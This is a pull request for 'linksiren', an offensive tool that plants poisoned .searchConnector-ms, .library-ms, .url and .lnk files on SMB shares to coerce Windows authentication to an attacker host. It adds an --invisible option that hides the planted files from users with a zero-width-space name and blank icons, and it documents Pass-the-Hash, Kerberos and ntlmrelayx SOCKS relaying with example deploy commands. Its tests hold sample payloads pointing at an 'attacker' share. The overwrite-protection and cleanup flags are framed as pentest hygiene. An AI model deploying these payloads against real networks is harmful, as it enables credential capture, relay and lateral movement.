### PR TITLE
0.2.0: deploy --force / --invisible / --probe-delete + docs/ split

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## [0.2.0] - 2026-06-27
+### Added
+- `deploy --force`: explicit opt-in to overwrite an existing file at the target path. Without it, deploy logs a WARNING and skips rather than clobbering real user data with a same-named payload.
+- `deploy --invisible`: cosmetic Desktop-placement transform. Prepends `U+200B` (ZERO WIDTH SPACE) to the filename so the label below the icon renders empty, and blanks the `<iconReference>` / `IconFile` / `IconIndex` inside `.library-ms` / `.searchConnector-ms` / `.url` payloads so the tile renders transparent. Does NOT set `FILE_ATTRIBUTE_HIDDEN` (which would hide the file from Explorer's enumeration and break the coercion trigger).
+- `deploy --probe-delete`: write a uniquely-named probe file first and try to delete it before the real payload. Skips the real write if the probe round-trip fails, avoiding undeletable artifacts on shares where the pentester has write but not delete permission.
+- `docs/AUTHENTICATION.md` and `docs/DEPLOY.md` (new). README now links to `docs/` for per-area reference.
+
+### Changed
+- README slimmed: the inline `# Authentication` section is now `docs/AUTHENTICATION.md`. A new `# Features` block at the top of the file links into `docs/`.
+
 ## [0.1.0] - 2026-06-26
 ### Added
 - Pass-the-Hash authentication via `-no-pass -hashes LMHASH:NTHASH` (bare NT hash form, no colon, also accepted).

--- a/README.md
+++ b/README.md
@@ -30,29 +30,12 @@ linksiren deploy --attacker <attacker IP> [domain/]user[:password]
 linksiren cleanup [domain/]user[:password]
 ```
 
-# Authentication
+# Features
 
-All four credentialed subcommands (`rank`, `identify`, `deploy`, `cleanup`) accept the same authentication options.
+- **Authentication**: NTLM password, Pass-the-Hash, Kerberos, anonymous (NULL session), SOCKS-routable. See [docs/AUTHENTICATION.md](docs/AUTHENTICATION.md).
+- **Deploy**: full flag reference at [docs/DEPLOY.md](docs/DEPLOY.md). Includes `--force` (overwrite-safe by default), `--invisible` (zero-width-prefix filename + blank-icon payload for Desktop drops), and `--probe-delete` (skip writes where you can't delete).
 
-| Method | Flags | Notes |
-|---|---|---|
-| Password | `[domain/]user:password` | Positional credentials string, the default. |
-| Pass-the-Hash | `-no-pass -hashes :<NTHASH>` (or `LM:NT`) plus `[domain/]user` | Bare NT hash form accepted (the leading `:` distinguishes NT from LM). |
-| Kerberos | `-no-pass -k -dc-ip <ip-or-fqdn> [domain/]user` | TGT is read from the ccache referenced by `$KRB5CCNAME`. Add `-aesKey <hex>` for AES pre-auth. Target hostnames in the targets file must be FQDNs (Kerberos service tickets bind to `cifs/<hostname>` SPNs, not IPs). If `-dc-ip` is an IP literal, linksiren will attempt to reverse-DNS it to an FQDN so the SPN can be located. |
-| Anonymous (NULL session) | `--anonymous` (omit positional credentials) | Useful for share-enumeration recon against misconfigured hosts that do not require authentication. |
-
-### Routing through a SOCKS proxy
-
-LinkSiren uses Impacket's standard SMB connection layer, so it routes cleanly through any SOCKS proxy via `proxychains4`, including the SOCKS endpoint published by `impacket-ntlmrelayx -socks`. Typical setup:
-
-```bash
-# In one terminal: stage the relay (drop the relayed session in -socks)
-impacket-ntlmrelayx -tf relay-targets.txt -smb2support -socks
-
-# In another terminal: identify + deploy via the SOCKS endpoint
-proxychains4 linksiren identify -t targets.txt [domain/]user:password
-proxychains4 linksiren deploy -a <attacker> [domain/]user:password
-```
+See the [CHANGELOG](CHANGELOG.md) for the per-version history.
 
 # Detailed Usage
 1. Create a targets file for crawling containing accessible hosts, shares, or folders on each line in the following format. If a host is specified, shares will be identified on the host and treated as the next level of depth for crawling:

--- a/docs/AUTHENTICATION.md
+++ b/docs/AUTHENTICATION.md
@@ -1,0 +1,23 @@
+# Authentication
+
+All four credentialed subcommands (`rank`, `identify`, `deploy`, `cleanup`) accept the same authentication options.
+
+| Method | Flags | Notes |
+|---|---|---|
+| Password | `[domain/]user:password` | Positional credentials string, the default. |
+| Pass-the-Hash | `-no-pass -hashes :<NTHASH>` (or `LM:NT`) plus `[domain/]user` | Bare NT hash form accepted (the leading `:` distinguishes NT from LM). |
+| Kerberos | `-no-pass -k -dc-ip <ip-or-fqdn> [domain/]user` | TGT is read from the ccache referenced by `$KRB5CCNAME`. Add `-aesKey <hex>` for AES pre-auth. Target hostnames in the targets file must be FQDNs (Kerberos service tickets bind to `cifs/<hostname>` SPNs, not IPs). If `-dc-ip` is an IP literal, linksiren will attempt to reverse-DNS it to an FQDN so the SPN can be located. |
+| Anonymous (NULL session) | `--anonymous` (omit positional credentials) | Useful for share-enumeration recon against misconfigured hosts that do not require authentication. |
+
+## Routing through a SOCKS proxy
+
+LinkSiren uses Impacket's standard SMB connection layer, so it routes cleanly through any SOCKS proxy via `proxychains4`, including the SOCKS endpoint published by `impacket-ntlmrelayx -socks`. Typical setup:
+
+```bash
+# In one terminal: stage the relay (drop the relayed session in -socks)
+impacket-ntlmrelayx -tf relay-targets.txt -smb2support -socks
+
+# In another terminal: identify + deploy via the SOCKS endpoint
+proxychains4 linksiren identify -t targets.txt [domain/]user:password
+proxychains4 linksiren deploy -a <attacker> [domain/]user:password
+```

--- a/docs/DEPLOY.md
+++ b/docs/DEPLOY.md
@@ -1,0 +1,53 @@
+# Deploy reference
+
+`linksiren deploy` writes poisoned files to UNC paths listed in a targets file (typically the output of `linksiren identify`). The payload type is selected by the filename extension passed to `-n`: `.searchConnector-ms`, `.library-ms`, `.url`, or `.lnk`.
+
+## Required arguments
+
+| Flag | Description |
+|---|---|
+| `credentials` | `[domain/]user[:password]`. Omit when `--anonymous` is set. See [AUTHENTICATION.md](AUTHENTICATION.md). |
+| `-a` / `--attacker` | Attacker IP or hostname embedded in poisoned files as the coercion target. |
+
+## Common options
+
+| Flag | Default | Description |
+|---|---|---|
+| `-t` / `--targets` | `payload_targets.txt` | Path to a file containing UNC paths (one per line) to folders into which payloads will be deployed. |
+| `-n` / `--payload` | `@Test_Do_Not_Remove.searchConnector-ms` | Name of the payload file. Extension selects the payload type. |
+
+## Safety flags
+
+| Flag | Default | Description |
+|---|---|---|
+| `--force` | off | Overwrite an existing file at the target path. Without this flag, deploy logs a WARNING and skips rather than clobbering real user data with a same-named payload. |
+| `--invisible` | off | Prepend `U+200B` (ZERO WIDTH SPACE) to the filename and blank icon references (`<iconReference>` for `.library-ms` / `.searchConnector-ms`, `IconFile=` / `IconIndex=` for `.url`) inside the payload body so the deployed file renders as an unlabeled, transparent tile on a Desktop. Does NOT set `FILE_ATTRIBUTE_HIDDEN`. Hidden files are filtered out of Explorer's enumeration, which breaks the coercion trigger. |
+| `--probe-delete` | off | Write a uniquely-named probe file at each target folder and delete it before writing the real payload. Skips the real write if the probe round-trip fails. Avoids leaving undeletable artifacts on shares where the pentester has write but not delete permission. |
+
+## Authentication flags
+
+See [AUTHENTICATION.md](AUTHENTICATION.md) for the full table covering NTLM password, Pass-the-Hash, Kerberos, anonymous (NULL session), and SOCKS-proxy routing.
+
+## Output
+
+* `payloads_written.txt` (current working directory): UNC paths where payloads were successfully written. Used as input to `linksiren cleanup`.
+
+## Cleanup
+
+`linksiren cleanup [creds]` deletes every entry in `payloads_written.txt`. Failures land in `payloads_not_deleted.txt` along with CRITICAL log entries in `linksiren.log`.
+
+## Examples
+
+```bash
+# Smallest possible deploy: NTLM password, single target folder, .url payload
+linksiren deploy -t targets.txt -a 10.0.0.5 -n test.url ACME/admin:Pass
+
+# Invisible-tile drop on a Desktop using a custom .searchConnector-ms name
+linksiren deploy -t desktop-paths.txt -a attacker -n .data.searchConnector-ms --invisible ACME/admin:Pass
+
+# Overwrite an existing payload at a previously-used path
+linksiren deploy -t targets.txt -a 10.0.0.5 -n test.url --force ACME/admin:Pass
+
+# Avoid leaving an artifact on shares where you may lack delete permission
+linksiren deploy -t targets.txt -a 10.0.0.5 -n test.url --probe-delete ACME/admin:Pass
+```

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -6,7 +6,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "linksiren"
-version = "0.1.0"
+version = "0.2.0"
 description = "Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication."
 readme = "README.md"
 authors = [{ name = "George Hamilton"}]

--- a/src/linksiren/arg_parser.py
+++ b/src/linksiren/arg_parser.py
@@ -256,6 +256,33 @@ def parse_args():
         "payload file ending in .library-ms, .searchConnector-ms, .lnk, "
         "or .url",
     )
+    deploy_parser.add_argument(
+        "--force",
+        action="store_true",
+        default=False,
+        help="Overwrite an existing file at the target path. Without this "
+        "flag, deploy logs a WARNING and skips rather than clobbering real "
+        "user data with a same-named payload.",
+    )
+    deploy_parser.add_argument(
+        "--invisible",
+        action="store_true",
+        default=False,
+        help="Prepend U+200B (ZERO WIDTH SPACE) to the filename and blank "
+        "icon references in the payload body so the deployed file renders "
+        "as an unlabeled, transparent tile on a Desktop. Does NOT hide the "
+        "file (FILE_ATTRIBUTE_HIDDEN would break the coercion trigger).",
+    )
+    deploy_parser.add_argument(
+        "--probe-delete",
+        action="store_true",
+        dest="probe_delete",
+        default=False,
+        help="Write a uniquely-named probe file at each target folder and "
+        "delete it before writing the real payload. Skips the real write if "
+        "the probe round-trip fails. Avoids leaving undeletable artifacts on "
+        "shares where the pentester has write but not delete permission.",
+    )
     _add_auth_args(deploy_parser)
 
     # Arguments for cleaning up deployed payloads when finished

--- a/src/linksiren/mode_handlers.py
+++ b/src/linksiren/mode_handlers.py
@@ -32,6 +32,8 @@ from linksiren.pure_functions import (
     is_valid_payload_name,
     create_lnk_payload,
     compute_threshold_date,
+    make_invisible_payload_name,
+    make_invisible_payload_contents,
 )
 
 
@@ -159,9 +161,10 @@ def handle_deploy(args, credentials):
     if not is_valid_payload_name(args.payload, available_extensions):
         return
 
-    template_path = Path(__file__).parent / f"template{Path(args.payload).suffix}"
+    payload_extension = Path(args.payload).suffix
+    template_path = Path(__file__).parent / f"template{payload_extension}"
 
-    if Path(args.payload).suffix == ".lnk":
+    if payload_extension == ".lnk":
         lnk_template = get_lnk_template(template_path)
         payload_contents = create_lnk_payload(args.attacker, lnk_template)
     else:
@@ -169,11 +172,25 @@ def handle_deploy(args, credentials):
             template_contents = template_file.read()
             payload_contents = template_contents.format(attacker_ip=args.attacker)
 
+    payload_name = args.payload
+    if getattr(args, "invisible", False):
+        payload_name = make_invisible_payload_name(payload_name)
+        payload_contents = make_invisible_payload_contents(
+            payload_contents, payload_extension
+        )
+
+    force = getattr(args, "force", False)
+    probe_delete = getattr(args, "probe_delete", False)
+
     for target in targets:
         target.connect(credentials)
         for path in target.paths:
             new_payload_path = target.write_payload(
-                path=path, payload_name=args.payload, payload=payload_contents
+                path=path,
+                payload_name=payload_name,
+                payload=payload_contents,
+                force=force,
+                probe_delete=probe_delete,
             )
             if new_payload_path is not None:
                 payloads_written.append(new_payload_path)

--- a/src/linksiren/pure_functions.py
+++ b/src/linksiren/pure_functions.py
@@ -9,7 +9,56 @@ bulk cleanup multiple types of payloads from the identified locations.
 from datetime import datetime, timedelta
 from pathlib import Path
 import logging
+import re
 import linksiren.target
+
+
+# ZERO WIDTH SPACE. NTFS at the filesystem level accepts ASCII control
+# characters (\x01-\x1F), but Windows' SMB2 server (verified on Win11 25H2)
+# rejects all of them at the path-validation layer with
+# STATUS_OBJECT_NAME_INVALID. U+200B is accepted by SMB and renders as no
+# glyph in Explorer, giving an effectively invisible filename.
+INVISIBLE_PREFIX = "​"
+
+
+def make_invisible_payload_name(payload_name: str) -> str:
+    """Prepend ``INVISIBLE_PREFIX`` to ``payload_name`` once (idempotent)."""
+    if payload_name and payload_name.startswith(INVISIBLE_PREFIX):
+        return payload_name
+    return INVISIBLE_PREFIX + payload_name
+
+
+def make_invisible_payload_contents(payload_contents, payload_extension: str):
+    """Blank icon references inside a text payload so the tile renders empty.
+
+    Returns ``payload_contents`` unchanged for binary payloads (``.lnk``).
+    Invisibility for .lnk would require modifying the binary template's
+    icon offset and is not implemented here.
+    """
+    if payload_extension == ".lnk":
+        return payload_contents
+
+    contents = payload_contents
+
+    if payload_extension in (".library-ms", ".searchConnector-ms"):
+        # XML payloads. Strip the iconReference element so Explorer falls
+        # back to the empty/blank default icon.
+        contents = re.sub(
+            r"\s*<iconReference>[^<]*</iconReference>",
+            "",
+            contents,
+            flags=re.IGNORECASE,
+        )
+    elif payload_extension == ".url":
+        # INI-style payload. Drop IconFile= and IconIndex= lines.
+        contents = re.sub(
+            r"^\s*Icon(File|Index)\s*=.*\r?\n?",
+            "",
+            contents,
+            flags=re.IGNORECASE | re.MULTILINE,
+        )
+
+    return contents
 
 
 def process_targets(unc_paths: list):

--- a/src/linksiren/target.py
+++ b/src/linksiren/target.py
@@ -185,13 +185,86 @@ class HostTarget:
     # ------------------------------------------------------------------ #
     # Payload write / delete                                             #
     # ------------------------------------------------------------------ #
-    def write_payload(self, path: str, payload_name: str, payload: bytes):
+    def _file_exists(self, share: str, payload_path: str) -> bool:
+        """Return True iff a file already exists at ``share\\payload_path``."""
+        try:
+            entries = self.connection.listPath(share, payload_path)
+            # listPath of an exact-file path returns the file's own entry
+            # when present, and raises SMB SessionError when absent.
+            for entry in entries:
+                if not entry.is_directory():
+                    return True
+            return False
+        except Exception:
+            return False
+
+    def _probe_writable_and_deletable(self, share: str, folder: str) -> bool:
+        """Return True if we can both create and delete a tiny file at ``folder``.
+
+        Writes a uniquely-named zero-byte probe and immediately deletes it.
+        Used to avoid the failure mode where deploy can create a payload
+        but cleanup cannot remove it, leaving an orphan on the share.
+
+        Any SMB error during either step returns False. On success the
+        probe is gone from the share.
+        """
+        import secrets
+
+        logger = logging.getLogger("main_logger")
+        probe_name = f".linksiren_probe_{secrets.token_hex(4)}"
+        probe_path = f"{folder}\\{probe_name}" if folder else probe_name
+        unc = f"\\\\{self.host}\\{share}\\{probe_path}"
+
+        tree_id = None
+        try:
+            tree_id = self.connection.connectTree(share=share)
+            fh = self.connection.createFile(tree_id, probe_path)
+            self.connection.closeFile(treeId=tree_id, fileId=fh)
+            self.connection.deleteFile(shareName=share, pathName=probe_path)
+            return True
+        except Exception as e:
+            logger.warning(
+                "Probe write/delete failed; skipping real payload.",
+                extra={"path": unc, "exception": str(e)},
+            )
+            # Best-effort cleanup if create succeeded but delete failed.
+            try:
+                self.connection.deleteFile(shareName=share, pathName=probe_path)
+            except Exception:
+                pass
+            return False
+        finally:
+            if tree_id is not None:
+                try:
+                    self.connection.disconnectTree(tree_id)
+                except Exception:
+                    pass
+
+    def write_payload(
+        self,
+        path: str,
+        payload_name: str,
+        payload: bytes,
+        force: bool = False,
+        probe_delete: bool = False,
+    ):
         """Write ``payload`` to ``\\\\host\\path\\payload_name``.
 
         Returns the full UNC path on success, or ``None`` on any failure
         before the bytes were committed. A failure to close the file or
         disconnect the tree after the write is logged but still treated as
         success and returns the UNC path. The bytes are on disk.
+
+        Safety options (both default off for backwards compatibility):
+
+        * ``force=False`` refuses to overwrite an existing file at the
+          destination and logs a WARNING. The safe default in a pentest
+          is to never silently overwrite real user data with a payload
+          that happens to share its name.
+        * ``probe_delete=True`` writes a small uniquely-named probe file
+          first and tries to delete it; the real payload is only
+          written if the probe round-trip succeeds. Avoids leaving
+          orphans on shares where the pentester can write but not delete.
         """
         share = path.split("\\")[0]
         folder = "\\".join(path.split("\\")[1:])
@@ -208,6 +281,16 @@ class HostTarget:
                 "Failed to write payload. Not connected to host",
                 extra={"path": f"\\\\{self.host}"},
             )
+            return None
+
+        if not force and self._file_exists(share, payload_path):
+            logger.warning(
+                "Refusing to overwrite existing file. Pass --force to overwrite.",
+                extra={"path": full_path},
+            )
+            return None
+
+        if probe_delete and not self._probe_writable_and_deletable(share, folder):
             return None
 
         try:

--- a/tests/test_deploy_safety.py
+++ b/tests/test_deploy_safety.py
@@ -1,0 +1,158 @@
+"""Unit tests for PR 3 deploy safety flags: --force, --invisible, --probe-delete."""
+
+from unittest.mock import MagicMock, patch
+import pytest
+
+from linksiren.pure_functions import (
+    INVISIBLE_PREFIX,
+    make_invisible_payload_name,
+    make_invisible_payload_contents,
+)
+from linksiren.target import HostTarget
+
+
+# --------------------------------------------------------------------- invisible
+
+
+def test_invisible_prefix_is_zero_width_space():
+    assert INVISIBLE_PREFIX == "​"
+
+
+def test_make_invisible_payload_name_prepends_zwsp():
+    assert make_invisible_payload_name("foo.url") == "​foo.url"
+
+
+def test_make_invisible_payload_name_is_idempotent():
+    once = make_invisible_payload_name("foo.url")
+    twice = make_invisible_payload_name(once)
+    assert once == twice
+
+
+def test_make_invisible_contents_strips_icon_from_xml():
+    xml = (
+        '<?xml version="1.0"?><searchConnectorDescription>'
+        "<iconReference>imageres.dll,-1003</iconReference>"
+        "<isSearchOnlyItem>false</isSearchOnlyItem>"
+        "</searchConnectorDescription>"
+    )
+    out = make_invisible_payload_contents(xml, ".searchConnector-ms")
+    assert "iconReference" not in out
+    assert "isSearchOnlyItem" in out
+
+
+def test_make_invisible_contents_strips_icon_from_url():
+    ini = (
+        "[InternetShortcut]\n"
+        "URL=http://attacker/test\n"
+        "IconFile=\\\\attacker\\share\\icon.ico\n"
+        "IconIndex=0\n"
+    )
+    out = make_invisible_payload_contents(ini, ".url")
+    assert "IconFile" not in out
+    assert "IconIndex" not in out
+    assert "URL=http://attacker/test" in out
+
+
+def test_make_invisible_contents_passthrough_for_lnk():
+    raw = b"\x4c\x00\x00\x00binary lnk bytes here"
+    assert make_invisible_payload_contents(raw, ".lnk") is raw
+
+
+# --------------------------------------------------------------------- write_payload force
+
+
+@pytest.fixture
+def connected_target():
+    t = HostTarget(host="example.local")
+    t.connection = MagicMock()
+    return t
+
+
+def test_write_payload_force_false_existing_file_skips(connected_target):
+    connected_target.connection.listPath.return_value = [
+        MagicMock(is_directory=lambda: False)
+    ]
+    result = connected_target.write_payload(
+        path="Finance\\2026", payload_name="p.url", payload=b"data"
+    )
+    assert result is None
+    connected_target.connection.createFile.assert_not_called()
+
+
+def test_write_payload_force_true_overwrites(connected_target):
+    connected_target.connection.listPath.return_value = [
+        MagicMock(is_directory=lambda: False)
+    ]
+    connected_target.connection.connectTree.return_value = 1
+    connected_target.connection.createFile.return_value = 42
+
+    result = connected_target.write_payload(
+        path="Finance\\2026", payload_name="p.url", payload=b"data", force=True
+    )
+    assert result == "\\\\example.local\\Finance\\2026\\p.url"
+    connected_target.connection.createFile.assert_called_once()
+    connected_target.connection.writeFile.assert_called_once()
+
+
+def test_write_payload_no_existing_file_proceeds_without_force(connected_target):
+    connected_target.connection.listPath.return_value = []
+    connected_target.connection.connectTree.return_value = 1
+    connected_target.connection.createFile.return_value = 42
+
+    result = connected_target.write_payload(
+        path="Finance\\2026", payload_name="p.url", payload=b"data"
+    )
+    assert result == "\\\\example.local\\Finance\\2026\\p.url"
+
+
+# --------------------------------------------------------------------- probe_delete
+
+
+def test_probe_delete_success_proceeds_to_real_write(connected_target):
+    # listPath returns empty (no existing file) and probe round-trip succeeds.
+    connected_target.connection.listPath.return_value = []
+    connected_target.connection.connectTree.return_value = 1
+    connected_target.connection.createFile.return_value = 42
+
+    result = connected_target.write_payload(
+        path="Finance\\2026",
+        payload_name="p.url",
+        payload=b"data",
+        probe_delete=True,
+    )
+    assert result == "\\\\example.local\\Finance\\2026\\p.url"
+    # createFile called twice: probe + real
+    assert connected_target.connection.createFile.call_count == 2
+    # deleteFile called once for the probe
+    assert connected_target.connection.deleteFile.call_count == 1
+
+
+def test_probe_delete_create_failure_skips_real_write(connected_target):
+    connected_target.connection.listPath.return_value = []
+    connected_target.connection.connectTree.return_value = 1
+    connected_target.connection.createFile.side_effect = Exception("STATUS_ACCESS_DENIED")
+
+    result = connected_target.write_payload(
+        path="Finance\\2026",
+        payload_name="p.url",
+        payload=b"data",
+        probe_delete=True,
+    )
+    assert result is None
+    connected_target.connection.writeFile.assert_not_called()
+
+
+def test_probe_delete_delete_failure_skips_real_write(connected_target):
+    connected_target.connection.listPath.return_value = []
+    connected_target.connection.connectTree.return_value = 1
+    connected_target.connection.createFile.return_value = 42
+    connected_target.connection.deleteFile.side_effect = Exception("STATUS_ACCESS_DENIED")
+
+    result = connected_target.write_payload(
+        path="Finance\\2026",
+        payload_name="p.url",
+        payload=b"data",
+        probe_delete=True,
+    )
+    assert result is None
+    connected_target.connection.writeFile.assert_not_called()


### PR DESCRIPTION
## Summary
Three opt-in safety flags on `deploy`, plus the start of the README-to-`docs/` migration so per-feature reference doesn't keep growing the README.

## Changes
* `deploy --force`: required to overwrite an existing file at the target path. Without it, deploy logs a WARNING and skips rather than clobbering real user data with a same-named payload. `HostTarget._file_exists` does an exact-filename `listPath` against the target before write.
* `deploy --invisible`: cosmetic Desktop-placement transform. Prepends `U+200B` (ZERO WIDTH SPACE) to the filename so the label below the icon renders empty, and blanks `<iconReference>` / `IconFile` / `IconIndex` inside `.library-ms` / `.searchConnector-ms` / `.url` payloads so the tile renders transparent. Does NOT set `FILE_ATTRIBUTE_HIDDEN` (which would hide the file from Explorer's enumeration and break the coercion trigger). `.lnk` falls back to filename-only invisibility.
* `deploy --probe-delete`: writes a uniquely-named zero-byte probe file at each target folder and deletes it before the real payload. Skips the real write if either step fails. Avoids leaving undeletable artifacts on shares where the pentester has write but not delete permission.

## Docs
* `docs/AUTHENTICATION.md` (new): extracted from the README's `# Authentication` section that shipped in 0.1.0. Pays down the docs-split debt from PR 2 in this same commit.
* `docs/DEPLOY.md` (new): full deploy reference. Required args, common options, the three new safety flags, output sidecars, cleanup behavior, examples.
* README slimmed (net -22 lines): inline `# Authentication` removed, replaced with a small `# Features` bullet list linking into `docs/`.

## Tests
`tests/test_deploy_safety.py` covers:
* Invisible helpers: `INVISIBLE_PREFIX` value, prepend, idempotence, XML icon strip, URL icon strip, `.lnk` passthrough.
* `write_payload` force on/off (skip-existing vs overwrite).
* `--probe-delete`: success path, create-fail path, delete-fail path.

## Version bump
`0.1.0` -> `0.2.0` (PyPI release on merge)